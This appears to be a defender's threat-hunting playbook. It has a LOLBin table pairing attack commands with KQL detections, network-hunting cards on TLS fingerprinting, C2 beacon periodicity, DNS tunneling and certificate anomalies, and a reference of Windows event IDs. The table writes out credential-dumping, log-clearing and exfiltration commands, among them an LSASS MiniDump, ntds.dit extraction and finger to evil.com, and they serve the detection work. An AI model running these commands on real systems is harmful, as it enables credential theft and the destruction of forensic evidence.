comsvcs.dll | Credential Access | Dump LSASS via MiniDump export | rundll32.exe comsvcs.dll, MiniDump <PID> C:\temp\dump.dmp full | process.command_line:*"comsvcs.dll"* and process.command_line:*"MiniDump"*
ntdsutil.exe | Credential Access | Extract ntds.dit from DC | ntdsutil.exe "ac i ntds" "ifm" "create full C:\temp" q q | process.name:"ntdsutil.exe" and process.command_line:(*"ifm"* or *"create full"*)
vssadmin.exe | Credential Access | Shadow copy → steal SAM/SYSTEM | vssadmin create shadow /for=C: | process.name:"vssadmin.exe" and process.command_line:*"create shadow"*
wevtutil.exe | Defense Evasion | Clear event logs | wevtutil.exe cl Security | process.name:"wevtutil.exe" and process.command_line:*"cl "*
fsutil.exe | Defense Evasion | Disable USN journal (anti-forensics) | fsutil usn deletejournal /d C: | process.name:"fsutil.exe" and process.command_line:*"deletejournal"*
attrib.exe | Defense Evasion | Set hidden/system attributes | attrib +h +s +r evil.exe | process.name:"attrib.exe" and process.command_line:(*"+h"* and *"+s"*)
esentutl.exe | Data Exfil | Copy locked files (ntds.dit) | esentutl.exe /y C:\Windows\NTDS\ntds.dit /d C:\temp\ntds.dit | process.name:"esentutl.exe" and process.command_line:(*"/y"* and *"/d"*)
finger.exe | Exfiltration / C2 | Exfil data via FINGER protocol | finger user@evil.com | process.name:"finger.exe"
makecab.exe | Archive | Archive files for exfiltration | makecab.exe C:\stolen.txt C:\stolen.cab | process.name:"makecab.exe" and process.parent.name:("cmd.exe" or "powershell.exe")
xcopy.exe | Lateral | Copy to admin share | xcopy.exe payload.exe \\VICTIM\C$\Windows\Temp\ | process.name:"xcopy.exe" and process.command_line:(*"\\\\"* and (*"C$"* or *"ADMIN$"*))
reg.exe | Credential / Persistence | Export SAM/SYSTEM/SECURITY hives | reg save HKLM\SAM C:\temp\sam.hive | process.name:"reg.exe" and process.command_line:(*"save"* and (*"HKLM\\SAM"* or *"HKLM\\SYSTEM"* or *"HKLM\\SECURITY"*))
wmic.exe | Execute / Lateral | Remote process creation | wmic /node:target process call create "cmd.exe /c calc" | process.name:"wmic.exe" and process.command_line:(*"/node:"* and *"process call create"*)
pcalua.exe | Execute | Run arbitrary command (compat) | pcalua.exe -a evil.exe | process.name:"pcalua.exe" and process.command_line:*"-a"*

🕸️ Network Hunting Depth 4 cards

Advanced network-layer detections that work against encrypted traffic without requiring TLS interception. JA3/JA4 TLS fingerprinting, Cobalt Strike/Sliver beacon detection via periodicity analysis, DNS tunneling pattern detection, and broader Encrypted Traffic Analysis. These are the techniques modern SOCs use when they can't break the crypto.

T1071.001

JA3/JA4 TLS Client Fingerprinting

MEDIUM [MITRE]

Summary: Use JA3 (legacy) or JA4 (modern) TLS client fingerprints to identify malware families, C2 frameworks, and tooling by how they speak TLS — even when traffic is encrypted.

Why this matters

You cannot read encrypted payloads, but you CAN read the unencrypted TLS ClientHello. JA3 hashes the ClientHello fields (version, cipher suites, extensions, elliptic curves, EC formats) into a 32-char MD5. Cobalt Strike, Sliver, Metasploit, and most malware families produce recognizable JA3/JA4 values because they use specific TLS libraries or configurations that differ from normal browsers. JA4 (John Althouse, 2023) is the evolution — more granular, includes ALPN and SNI domain, and is human-readable (e.g., t13d1516h2_8daaf6152771_02713d6af862).

What to look for

TLS connections with JA3/JA4 hashes on public blocklists (abuse.ch, CrowdStrike, FoxIO). Internal hosts generating the same uncommon JA3 to multiple external IPs (malware pattern). A single JA3 appearing from many internal hosts to one external IP (tool being distributed internally).

KQL (Zeek/Arkime) Known Cobalt Strike JA3 hashes — from abuse.ch JA3 database
event.dataset:(zeek.ssl or arkime.session) and tls.client.ja3:("72a589da586844d7f0818ce684948eea" or "37f463bf4616ecd445d4a1937da06e19" or "a0e9f5d64349fb13191bc781f81f42e1")
KQL (Zeek) JA4 hunt — unusual TLS fingerprint from a single host to many destinations
event.dataset:zeek.ssl and tls.client.ja4:*
-- Aggregate: unique tls.client.ja4 by source.ip, count distinct destination.ip
-- Alert when a rare JA4 connects to 10+ destinations from one host
Suricata Sliver default JA3 signature
alert tls any any -> any any (msg:"Sliver Default JA3 Observed";
    ja3.hash; content:"e76d33fd41f5c11f7a8d4e9ebd0a3fa9";
    classtype:command-and-control; sid:9200001; rev:1;)
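How a JA3 value is actually derived from the ClientHello fields named in "Why this matters", as an added Python example (not from the playbook, and not Zeek's or Suricata's implementation). It also shows why GREASE values have to be stripped: browsers randomise them per connection, so leaving them in would give the same client a different hash every time. The ClientHello field values and the feed entry are constructed.

```python
"""Build a JA3 fingerprint from parsed ClientHello fields.

Added example (not from the playbook). JA3 is the MD5 of
"version,ciphers,extensions,curves,curve_formats", each list being the
decimal values in ClientHello order joined with '-', after dropping GREASE
values (RFC 8701). The ClientHello values and feed entry are constructed.
"""
import hashlib


def is_grease(value):
    """GREASE values are 0x0a0a, 0x1a1a, ..., 0xfafa: both bytes equal, low nibble 0xa."""
    return (value & 0x0F0F) == 0x0A0A and (value >> 8) == (value & 0xFF)


def ja3_string(version, ciphers, extensions, curves, curve_formats):
    def field(values):
        return "-".join(str(v) for v in values if not is_grease(v))
    return ",".join([str(version), field(ciphers), field(extensions), field(curves),
                     "-".join(str(v) for v in curve_formats)])


def ja3_hash(version, ciphers, extensions, curves, curve_formats):
    return hashlib.md5(ja3_string(version, ciphers, extensions, curves, curve_formats).encode()).hexdigest()


def match_blocklist(ja3, blocklist):
    """Look a fingerprint up in a {hash: label} feed; None when unknown."""
    return blocklist.get(ja3)


# Constructed ClientHello (record version 771 = 0x0303) with GREASE entries
# in the cipher, extension and curve lists, as a browser would send.
SAMPLE_HELLO = dict(
    version=771,
    ciphers=[0x1A1A, 4865, 4866, 4867, 49195, 49199],
    extensions=[0x2A2A, 0, 23, 65281, 10, 11, 35, 16, 5, 13],
    curves=[0x3A3A, 29, 23, 24],
    curve_formats=[0],
)
# The same client on a later connection, with freshly randomised GREASE values.
SAMPLE_HELLO_REGREASED = dict(SAMPLE_HELLO,
                              ciphers=[0xFAFA, 4865, 4866, 4867, 49195, 49199],
                              extensions=[0x0A0A, 0, 23, 65281, 10, 11, 35, 16, 5, 13],
                              curves=[0x8A8A, 29, 23, 24])

# Constructed feed keyed by the sample's own hash, standing in for an abuse.ch-style list.
BLOCKLIST = {ja3_hash(**SAMPLE_HELLO): "constructed-sample-client"}

if __name__ == "__main__":
    print(ja3_string(**SAMPLE_HELLO))
    print(ja3_hash(**SAMPLE_HELLO), match_blocklist(ja3_hash(**SAMPLE_HELLO), BLOCKLIST))
```

Because the hash covers the whole cipher and extension list in order, a tool that pins one TLS library and configuration keeps the same JA3 across versions of its payloads, which is why feed matches are worth a look even when the destination is unremarkable.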

🛡️ Mitigations

  • Deploy Zeek or Suricata with JA3/JA4 logging (enabled by default in modern versions)
  • Subscribe to JA3/JA4 threat feeds (abuse.ch SSLBL, CrowdStrike, FoxIO)
  • Log TLS fingerprints in Elastic/Splunk — retain 90+ days for retroactive hunt
  • For high-assurance: combine JA3 with destination IP geolocation + ASN rarity

🔧 Tools used by attackers / defenders

Zeek (ssl.log), Suricata (TLS.JA3), Arkime, JA4+ (FoxIO)
T1071

Cobalt Strike / Sliver Beacon Detection

CRITICAL [MITRE]

Summary: Beacon detection by looking for periodic callbacks with jitter — the core behavior of every C2 framework.

Why this matters

All C2 frameworks (Cobalt Strike, Sliver, Havoc, Mythic, Metasploit) operate on beacons: the compromised host periodically calls home to check for commands. Default sleep intervals (60s, 5m) combined with jitter (random offset) produce a distinctive statistical signature — connections at roughly regular intervals to the same destination. You can detect this even over HTTPS without breaking TLS.

What to look for

A single source IP connecting to a single destination with consistent intervals (30s-5min being most common). Low standard deviation in connection timing (jitter < 20% of interval). Small, consistent request sizes (beacon check-in ≈ 200-1KB). TLS connections to IPs without matching DNS queries.

KQL (network logs) Periodicity — 50+ connections in 1hr from one host to one destination at regular intervals
event.dataset:(zeek.conn or network.*) and not destination.ip:(10.0.0.0/8 or 192.168.0.0/16 or 172.16.0.0/12)
-- Aggregate: source.ip + destination.ip, count over 1hr windows
-- Sub-aggregate: stddev(time_delta) for periodicity
-- Alert when count > 50 AND stddev < 20%
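The periodicity aggregation sketched in the comments above, as an added worked example (not part of this playbook, nor RITA's or Zeek's code): flows are grouped by source and external destination, inter-arrival deltas are computed, and pairs with 50+ flows whose timing stddev is under 20% of the mean interval are flagged. Field names follow Zeek conn.log; the IPs, timestamps and byte counts are constructed.

```python
"""Beacon periodicity scoring over Zeek conn.log-style records (added example).

Mirrors the playbook's aggregation: group flows by (source.ip, destination.ip),
drop RFC1918 destinations, compute inter-arrival deltas, and flag pairs with
count >= 50 whose stddev(delta) is below 20% of the mean interval. The caller
passes one time window (e.g. one hour) of flows.
"""
import ipaddress
import random
import statistics
from collections import defaultdict

INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "192.168.0.0/16", "172.16.0.0/12")]


def is_internal(ip: str) -> bool:
    """True for RFC1918 destinations, which the hunt excludes."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def pair_stats(records, min_count=50, max_jitter=0.20):
    """Per (src, dst) pair with >= min_count flows: interval mean/stddev,
    jitter ratio (stddev / mean), mean request size and a beacon verdict."""
    flows = defaultdict(list)
    for r in records:
        if is_internal(r["id.resp_h"]):
            continue
        flows[(r["id.orig_h"], r["id.resp_h"])].append(r)

    stats = {}
    for key, fl in flows.items():
        if len(fl) < min_count:
            continue
        ts = sorted(f["ts"] for f in fl)
        deltas = [later - earlier for earlier, later in zip(ts, ts[1:])]
        mean = statistics.mean(deltas)
        sd = statistics.pstdev(deltas)
        jitter = sd / mean if mean > 0 else float("inf")
        stats[key] = {
            "count": len(fl),
            "mean_interval_s": round(mean, 2),
            "stddev_interval_s": round(sd, 2),
            "jitter": jitter,
            "mean_orig_bytes": round(statistics.mean(f["orig_bytes"] for f in fl)),
            "beacon": jitter < max_jitter,
        }
    return stats


def beacon_candidates(records, **thresholds):
    """Sorted list of (src, dst) pairs that meet the beacon criteria."""
    return sorted(k for k, s in pair_stats(records, **thresholds).items() if s["beacon"])


def constructed_conn_log(seed=7):
    """Synthetic flows for one 1-hour window (constructed, not real traffic):
    a 60s-sleep beacon with +/-10% jitter, a bursty browsing session, and an
    internal file-server pair that the RFC1918 filter should drop."""
    rng = random.Random(seed)
    t0 = 1_700_000_000.0
    rows = []
    t = t0
    for _ in range(60):  # beacon: ~600-byte check-ins every 54-66 seconds
        rows.append({"ts": t, "id.orig_h": "10.1.2.50", "id.resp_h": "203.0.113.7",
                     "orig_bytes": 600 + rng.randint(-40, 40)})
        t += 60 * (1 + rng.uniform(-0.10, 0.10))
    t = t0
    for _ in range(55):  # browsing: exponential gaps, wildly varying sizes
        rows.append({"ts": t, "id.orig_h": "10.1.2.51", "id.resp_h": "198.51.100.20",
                     "orig_bytes": rng.randint(200, 50_000)})
        t += rng.expovariate(1 / 30)
    for i in range(80):  # internal SMB chatter: regular, but not an external destination
        rows.append({"ts": t0 + 30 * i, "id.orig_h": "10.1.2.52", "id.resp_h": "10.1.9.9",
                     "orig_bytes": 1200})
    rng.shuffle(rows)
    return rows


if __name__ == "__main__":
    for pair, s in pair_stats(constructed_conn_log()).items():
        print(pair, s)
```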
KQL Outbound HTTPS with no prior DNS query for destination IP (direct IP beacon)
event.dataset:zeek.ssl and destination.port:443
-- Left-anti-join against zeek.dns for the same destination.ip in prior 5min
-- Alert on destination.ip with no DNS history
Suricata Cobalt Strike default HTTP profile (pre-malleable)
alert http any any -> any any (msg:"Cobalt Strike Default HTTP GET Beacon";
    flow:established,to_server; http.method; content:"GET";
    http.uri; pcre:"/^\/[a-zA-Z0-9]{4}$/";
    http.user_agent; content:"Mozilla/5.0 (compatible\; MSIE 8.0\; Windows NT 6.1\;";
    classtype:trojan-activity; sid:9200002; rev:1;)

🛡️ Mitigations

  • Deploy a C2 beacon analyzer — RITA (Real Intelligence Threat Analytics) from Black Hills
  • Monitor outbound HTTPS to new/low-reputation IPs
  • Alert on encrypted connections without prior DNS lookup
  • Network egress filtering — allowlist approved outbound destinations where feasible
  • EDR with memory scanning — most beacons live in memory and are catchable there

🔧 Tools used by attackers / defenders

RITA · Zeek · Suricata · CobaltStrikeParser (attacker tooling analysis)
T1071.004

DNS Tunneling (Advanced Detection)

HIGH [MITRE]

Summary: Detect data exfiltration and C2 hidden inside DNS queries — encoded in subdomains, TXT records, or raw query volumes.

Why this matters

DNS tunneling works because DNS is allowed outbound from virtually everywhere. Attackers encode data into subdomain labels (a.b.c.evil.com where a/b/c are base32-encoded data) and read responses from TXT records. Tools like Iodine, dnscat2, and DNSStager do this transparently. Legitimate DNS queries are short, targeted, and reuse the same domains. Tunneling creates long queries with high entropy and thousands of unique subdomains under one parent domain.

What to look for

Unusually long subdomain labels (>40 chars). High entropy in subdomain (close to random). Thousands of unique subdomains queried under one parent domain in short time. High rate of TXT record queries. Non-resolving queries with NXDOMAIN responses in large volume.

KQL (DNS logs) Subdomains > 40 characters — near-certain tunneling
event.dataset:zeek.dns and dns.question.name:/[a-zA-Z0-9+\/=]{40,}\..*/
KQL Unique subdomain count per parent domain per host (tunneling pattern)
event.dataset:zeek.dns
-- Aggregate: group by source.ip + registered_domain
-- Count distinct dns.question.name over 1hr
-- Alert when count > 100
KQL TXT record query rate per host (C2-over-DNS signature)
event.dataset:zeek.dns and dns.question.type:"TXT"
-- Aggregate by source.ip over 5min
-- Alert when TXT queries > 50 in window
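The three DNS hunts above combined into one scoring pass, as an added example (not the playbook's own code): longest subdomain label, distinct names per source and parent domain, TXT query count, plus the Shannon entropy scoring the mitigations mention. Field names follow Zeek dns.log; the parent-domain split is a two-label simplification, and the query data is constructed.

```python
"""DNS tunneling scoring over Zeek dns.log-style records (added example).

One pass over a time window of queries, grouped by (source, parent domain):
longest label (> 40), distinct query names (> 100), TXT queries (> 50), and
Shannon entropy of the subdomain part as a supporting indicator.
"""
import math
import random
from collections import Counter, defaultdict

BASE32 = "abcdefghijklmnopqrstuvwxyz234567"


def shannon_entropy(s: str) -> float:
    """Bits per character: 0.0 for 'www', approaching 5.0 for random base32."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def registered_domain(name: str) -> str:
    """Parent domain = last two labels. Simplification for this example; real
    pipelines use the Public Suffix List (ECS dns.question.registered_domain)."""
    labels = name.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def score_dns(records, max_label=40, max_distinct=100, max_txt=50, entropy_floor=3.5):
    """Per (source.ip, parent domain): distinct names, longest label, mean
    subdomain entropy, TXT count, and a verdict using the playbook thresholds."""
    groups = defaultdict(list)
    for r in records:
        groups[(r["id.orig_h"], registered_domain(r["query"]))].append(r)

    out = {}
    for (src, parent), rs in groups.items():
        names = {r["query"].rstrip(".").lower() for r in rs}
        # strip ".parent" to get the encoded-data part, e.g. "a.b.c" of a.b.c.evil.com
        subdomains = [n[: -len(parent) - 1] for n in names if n.endswith("." + parent)]
        labels = [lab for sub in subdomains for lab in sub.split(".") if lab]
        longest = max((len(lab) for lab in labels), default=0)
        ent = (sum(shannon_entropy(s.replace(".", "")) for s in subdomains) / len(subdomains)
               if subdomains else 0.0)
        txt = sum(1 for r in rs if r["qtype_name"] == "TXT")
        out[(src, parent)] = {
            "distinct_names": len(names),
            "longest_label": longest,
            "mean_entropy": round(ent, 2),
            "txt_queries": txt,
            "high_entropy": ent > entropy_floor,
            "tunnel": longest > max_label or len(names) > max_distinct or txt > max_txt,
        }
    return out


def constructed_dns_log(seed=11):
    """Synthetic dns.log rows (constructed): one host pushing 120 TXT queries with
    50-char base32 labels under a single parent, one host doing normal A lookups."""
    rng = random.Random(seed)
    t0 = 1_700_000_000.0
    rows = []
    for i in range(120):
        payload = "".join(rng.choice(BASE32) for _ in range(50))
        rows.append({"ts": t0 + 2 * i, "id.orig_h": "10.1.2.60",
                     "query": f"{payload}.{i:04x}.tun.example-tunnel.net", "qtype_name": "TXT"})
    hosts = ["www.example.com", "mail.example.com", "cdn.example.com"]
    for i in range(60):
        rows.append({"ts": t0 + 60 * i, "id.orig_h": "10.1.2.61",
                     "query": hosts[i % 3], "qtype_name": "A"})
    return rows


if __name__ == "__main__":
    for key, s in score_dns(constructed_dns_log()).items():
        print(key, s)
```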
Suricata Iodine DNS tunnel — known magic string in query
alert dns any any -> any any (msg:"Iodine DNS Tunnel Handshake";
    dns.query; content:"|76 6f 69|"; depth:3;
    classtype:command-and-control; sid:9200003; rev:1;)

🛡️ Mitigations

  • Deploy DNS RPZ (Response Policy Zone) — blocks known tunneling domains
  • Rate-limit DNS queries per source (anything >100/min per host is suspicious)
  • Block external DNS resolvers — force all DNS through internal resolvers with logging
  • Monitor TXT record query volume — most legitimate orgs have very little
  • Deploy DNSSEC validation + Shannon entropy scoring on resolved hostnames

🔧 Tools used by attackers / defenders

Zeek · Suricata DNS · Splunk DNSHunter · SIE (Farsight) · Iodine/dnscat2 (attacker)
T1573

Encrypted Traffic Analysis (ETA)

MEDIUM [MITRE]

Summary: Hunt threats in encrypted traffic WITHOUT decryption โ€” using metadata patterns, flow features, and behavioral analysis.

Why this matters

Most modern malware uses TLS. Breaking TLS at scale is expensive and privacy-invasive. ETA works by analyzing features that are visible in encrypted streams: packet sizes, timings, SNI, TLS fingerprints, certificate properties. Combined, these features produce statistical signatures distinct enough to identify C2, data exfiltration, and malware even when payloads are opaque.

What to look for

Self-signed certificates to non-internal destinations. Certificates issued by rare/unknown CAs. Certificates with obviously-fake organization names (e.g., 'CN=Microsoft Corp' on a non-Microsoft IP). Mismatch between SNI and certificate subject. Short-lived certificates (<30d) to destinations you don't recognize.

KQL (Zeek x509/ssl) Self-signed certificates on external connections
event.dataset:zeek.x509 and not destination.ip:(10.0.0.0/8 or 192.168.0.0/16 or 172.16.0.0/12)
-- KQL cannot compare two fields: flag rows where tls.server.x509.issuer.common_name equals tls.server.x509.subject.common_name in a scripted field or ES|QL
-- Alternative: Zeek ssl.log validation_status "self signed certificate" (needs the validate-certs policy loaded)
KQL Let's Encrypt certificates for recently-registered domains (malware staging pattern)
event.dataset:zeek.x509 and tls.server.x509.issuer.organization:"Let's Encrypt"
-- Enrich destination.domain with domain registration date from whois
-- Alert when domain is less than 30 days old
KQL SNI/subject CN mismatch — indicator of certificate spoofing or MITM
event.dataset:zeek.ssl and tls.client.server_name:* and tls.server.x509.subject.common_name:*
-- Alert when tls.client.server_name != tls.server.x509.subject.common_name AND server_name is not covered by tls.server.x509.alternative_names (honor *.wildcard labels)
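The three certificate hunts above implemented over ssl.log/x509.log-style records, as an added example (not the playbook's code): self-signed certificate to an external destination, SNI vs CN/SAN mismatch with RFC 6125 wildcard rules, and short-lived (< 30 day) certificates. The certificate records, hostnames and IPs are constructed.

```python
"""Certificate and SNI checks for encrypted-traffic hunting (added example).

Each connection record carries the destination IP, the client SNI and the
server certificate's subject/issuer DNs, SAN list and validity window, as
Zeek ssl.log / x509.log would provide them.
"""
import ipaddress
from datetime import datetime, timedelta

INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "192.168.0.0/16", "172.16.0.0/12")]


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def is_self_signed(cert) -> bool:
    """Issuer DN equals subject DN. The KQL card compares only common_name;
    comparing the whole DN avoids false hits on unrelated CAs sharing a CN."""
    return cert["issuer"] == cert["subject"]


def name_matches(pattern: str, host: str) -> bool:
    """RFC 6125-style match: exact, or a single leading '*.' that covers exactly
    one label (*.example.com matches www.example.com, not example.com or a.b.example.com)."""
    pattern, host = pattern.lower().rstrip("."), host.lower().rstrip(".")
    if pattern == host:
        return True
    if not pattern.startswith("*."):
        return False
    labels = host.split(".")
    return len(labels) >= 3 and ".".join(labels[1:]) == pattern[2:]


def sni_matches_cert(server_name: str, cert) -> bool:
    """True when the SNI matches the subject CN or any SAN dNSName."""
    names = [cert["subject"].get("CN")] + list(cert.get("san", []))
    return any(name_matches(n, server_name) for n in names if n)


def lifetime_days(cert) -> int:
    return (cert["not_after"] - cert["not_before"]).days


def findings(conn, short_lived_days=30):
    """Finding tags for one TLS connection record, in the order of the KQL cards."""
    cert, tags = conn["cert"], []
    if not is_internal(conn["dst_ip"]):
        if is_self_signed(cert):
            tags.append("self_signed_external")
        if lifetime_days(cert) < short_lived_days:
            tags.append("short_lived_cert")
    if conn.get("server_name") and not sni_matches_cert(conn["server_name"], cert):
        tags.append("sni_mismatch")
    return tags


def _cert(subject, issuer, san=(), days=90):
    """Constructed certificate record (not a real certificate)."""
    start = datetime(2024, 1, 1)
    return {"subject": subject, "issuer": issuer, "san": list(san),
            "not_before": start, "not_after": start + timedelta(days=days)}


# Constructed connections covering each hunt; IPs are documentation ranges.
CONSTRUCTED_CONNECTIONS = {
    "fake_msft": {"dst_ip": "203.0.113.9", "server_name": "update.microsoft.com",
                  "cert": _cert({"CN": "Microsoft Corp"}, {"CN": "Microsoft Corp"}, days=14)},
    "legit": {"dst_ip": "198.51.100.30", "server_name": "www.example.com",
              "cert": _cert({"CN": "example.com"}, {"CN": "R3", "O": "Let's Encrypt"},
                            san=["example.com", "www.example.com"], days=90)},
    "wildcard_mismatch": {"dst_ip": "198.51.100.31", "server_name": "api.example.org",
                          "cert": _cert({"CN": "*.example.net"}, {"CN": "Some CA", "O": "Some CA"},
                                        san=["*.example.net"])},
    "internal_lab": {"dst_ip": "10.5.5.5", "server_name": "lab.corp.local",
                     "cert": _cert({"CN": "lab.corp.local"}, {"CN": "lab.corp.local"}, days=3650)},
}


if __name__ == "__main__":
    for label, conn in CONSTRUCTED_CONNECTIONS.items():
        print(label, findings(conn))
```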

🛡️ Mitigations

  • Deploy encrypted traffic classification — Cisco ETA, Darktrace, Vectra AI
  • Inline TLS inspection for high-risk categories (uncategorized, newly-registered domains)
  • Certificate transparency monitoring — detect unauthorized certs issued for your domains
  • Baseline typical certificate issuers per user/department — alert on outliers

🔧 Tools used by attackers / defenders

Zeek · Cisco ETA · Darktrace · Corelight · Splunk Stream

📋 Windows Event ID + Sysmon Reference (48 events)

Searchable reference of 48 critical Event IDs across Windows Security, System, PowerShell Operational, and Sysmon logs. Each entry includes what the event means, what to hunt for in it, key fields for queries, and a severity baseline.

EID | Source | Name | Category | What it means | What to hunt for | Key Fields | Severity
--- | --- | --- | --- | --- | --- | --- | ---
4624 | Security | Successful Logon | Authentication | An account successfully logged on to the system. | LogonType 10 (RDP), LogonType 3 (Network/SMB) for privileged accounts. NTLM authentications using high-privilege accounts. LogonGuid of all zeros (Pass-the-Hash indicator). | TargetUserName, LogonType, IpAddress, AuthenticationPackageName, LogonProcessName, LogonGuid | Info
4625 | Security | Failed Logon | Authentication | An account failed to log on. Status code reveals reason. | Bursts (10+ failures in short window) = brute force. Same source IP failing on multiple usernames = password spray. Status 0xC0000064 = bad username, 0xC000006A = bad password. | TargetUserName, IpAddress, FailureReason, Status, SubStatus | Low
4634 | Security | Logoff | Authentication | An account logged off. | Pair with 4624 to compute session duration. Very short admin sessions (<60s) can indicate scripted credential validation. | TargetUserName, LogonType, LogonId | Info
4648 | Security | Logon Using Explicit Credentials | Authentication | Logon initiated using credentials different from the current user (e.g., runas, wmic /user:). | User A explicitly using User B's credentials — common in lateral movement. Service accounts being used interactively. | SubjectUserName, TargetUserName, TargetServerName, ProcessName | Medium
4662 | Security | AD Object Operation | AD Activity | Operation performed on an Active Directory object — including replication. | Replication GUIDs (1131f6aa, 1131f6ad, 89e95b76) from non-DC accounts = DCSync attack. Property writes to high-value objects. | Properties, ObjectName, AccessMask, SubjectUserName | Medium
4663 | Security | Object Access Attempted | File/Object Access | An attempt was made to access an object (typically file system). | Access to sensitive files (SAM, SYSTEM, ntds.dit). Bulk reads of share data prior to exfiltration. | ObjectName, AccessMask, ProcessName, SubjectUserName | Low
4670 | Security | Permissions on Object Changed | File/Object Access | Permissions on an object were changed. | ACL modifications on AD objects (combined with 5136). Permission grants on sensitive registry keys or files. | ObjectName, OldSd, NewSd, SubjectUserName | Medium
4672 | Security | Special Privileges Assigned | Privilege Use | Special privileges (admin-equivalent) assigned to a new logon. | Indicates an admin/SYSTEM logon. Pair with 4624 to identify privileged sessions for tracking. | SubjectUserName, PrivilegeList | Info
4688 | Security | Process Creation | Process Activity | A new process was created. | Suspicious process lineage (winword → cmd). LOLBin abuse. Encoded PowerShell. Requires audit policy: 'Audit Process Creation' enabled, optionally 'Include command line in process creation events' GPO. | ProcessName, CommandLine, ParentProcessName, SubjectUserName | Info (high-volume)
4697 | Security | Service Installed | Persistence | A service was installed in the system. | Services with paths in user-writable directories (Temp, Public, AppData). Service names like PSEXESVC, PAExec — lateral movement indicators. | ServiceName, ServiceFileName, ServiceType, ServiceStartType | Medium
4698 | Security | Scheduled Task Created | Persistence | A scheduled task was created. | Tasks created from non-admin processes. Tasks with generic names (Updater, SystemCheck). Tasks running PowerShell with encoded commands. | TaskName, TaskContent, SubjectUserName | Medium
4699 | Security | Scheduled Task Deleted | Persistence | A scheduled task was deleted. | Mass task deletions (potentially malware cleanup). Deletion of legitimate security/monitoring tasks. | TaskName, SubjectUserName | Low
4720 | Security | User Account Created | Account Management | A user account was created. | Accounts created outside business hours. Accounts with names mimicking system accounts (svc_admin, helpdesk_svc). | TargetUserName, SubjectUserName | Medium
4724 | Security | Password Reset by Admin | Account Management | An attempt was made to reset an account's password. | Password resets on privileged accounts (Domain Admins, krbtgt). Resets from non-admin sources. | TargetUserName, SubjectUserName | Medium
4728 | Security | Member Added to Security-Enabled Global Group | Account Management | A user was added to a global security group. | Additions to Domain Admins, Enterprise Admins, Schema Admins, Account Operators groups. Additions outside change windows. | MemberName, TargetUserName, SubjectUserName | High
4732 | Security | Member Added to Security-Enabled Local Group | Account Management | A user was added to a local security group. | Additions to local Administrators group on workstations/servers. Service accounts being added to admin groups. | MemberName, TargetUserName, SubjectUserName | High
4738 | Security | User Account Changed | Account Management | A user account attribute was changed. | UserAccountControl flag changes — DONT_REQ_PREAUTH (4194304) enables AS-REP Roasting. PASSWORD_NOT_REQUIRED set on accounts. | TargetUserName, UserAccountControl, SubjectUserName | Medium
4756 | Security | Member Added to Security-Enabled Universal Group | Account Management | A user was added to a universal security group. | Additions to Enterprise Admins (universal scope). Cross-domain group changes. | MemberName, TargetUserName, SubjectUserName | High
4768 | Security | Kerberos TGT Requested | Kerberos | A Kerberos authentication ticket (TGT) was requested. | PreAuthType=0 (no pre-auth) = AS-REP Roasting. RC4 encryption type with PreAuthType=0 = high-fidelity attack indicator. | TargetUserName, TicketEncryptionType, PreAuthType, IpAddress | Info (volume)
4769 | Security | Kerberos Service Ticket Requested | Kerberos | A Kerberos service ticket (TGS) was requested. | TicketEncryptionType 0x17 (RC4) with TicketOptions 0x40810000 = Kerberoasting. Bursts of TGS requests for many SPNs from one user. | TargetUserName, ServiceName, TicketEncryptionType, IpAddress | Info (volume)
4776 | Security | NTLM Authentication | Authentication | Domain controller validated credentials over NTLM. | Status 0xC0000064 (no such user), 0xC000006A (bad password), 0xC0000234 (locked). NTLM use for high-privilege accounts. | TargetUserName, Workstation, Status | Info
5136 | Security | AD Object Modified | AD Activity | A directory service object was modified. | Modifications to nTSecurityDescriptor on domain root (DCSync rights grants). Changes to GPOs from unusual sources. | ObjectDN, AttributeLDAPDisplayName, AttributeValue, SubjectUserName | Medium
5145 | Security | Detailed File Share Access | File Share | A network share object was accessed with detailed audit info. | Access to IPC$ share with named pipes (lsarpc, samr, efsrpc) = coerced authentication / PetitPotam patterns. | ShareName, RelativeTargetName, IpAddress, AccessMask | Low
1102 | Security | Audit Log Cleared | Defense Evasion | The audit log was cleared. | ALWAYS investigate. Should be extremely rare in normal operation. Often precedes or follows attacker actions. | SubjectUserName | Critical
104 | System | Event Log Cleared (System) | Defense Evasion | A System event log file was cleared. | Same investigation priority as 1102. Sometimes the System log contains evidence the attacker wants to remove. | SubjectUserName, Channel | Critical
7045 | System | New Service Installed | Persistence | A service was installed on the system. | Service names PSEXESVC, PAExec, RemCom (lateral movement). ImagePath in Temp/Public/AppData. Cmd.exe or PowerShell directly in the ImagePath. | ServiceName, ImagePath, ServiceType, StartType | Medium
7034 | System | Service Crashed Unexpectedly | Defense Evasion | A service terminated unexpectedly. | Crashes of security/EDR services (Defender, CrowdStrike, SentinelOne) — could indicate tampering. | ServiceName, CrashCount | Medium
7036 | System | Service Status Change | Service Activity | A service entered the running or stopped state. | Security services being stopped. Known PsExec/lateral movement service names starting up. | ServiceName, NewState | Low
4103 | PowerShell/Operational | Module Logging | PowerShell | PowerShell module pipeline execution recorded. | Pipeline data may contain decoded malicious commands. Requires Module Logging GPO enabled. | ContextInfo, Payload, UserId | Info
4104 | PowerShell/Operational | Script Block Logging | PowerShell | Captured script block (most useful PS log). | Decoded EncodedCommand contents appear here. Mimikatz signatures, Invoke-Expression chains, AMSI bypass attempts. ENABLE THIS via GPO. | ScriptBlockText, Path, MessageNumber, MessageTotal | Info (high-value)
4105 | PowerShell/Operational | Script Block Started | PowerShell | Indicates the start of a PowerShell script block invocation. | Useful for correlating start-times of script execution with other events. | ScriptBlockId, ProcessId | Info
1 | Sysmon | Process Create | Process Activity | Process creation with rich detail (hash, parent image, GUID, integrity). | Same as 4688 + file hashes for known-bad lookups, ParentProcessGuid for accurate tree reconstruction, OriginalFileName (defeats simple renames). | Image, CommandLine, ParentImage, Hashes, OriginalFileName, IntegrityLevel | Info (volume)
2 | Sysmon | File Creation Time Changed | Defense Evasion | A process changed a file's creation time (timestomping). | Processes other than backup/install tools modifying file timestamps = anti-forensics indicator. | Image, TargetFilename, CreationUtcTime, PreviousCreationUtcTime | Medium
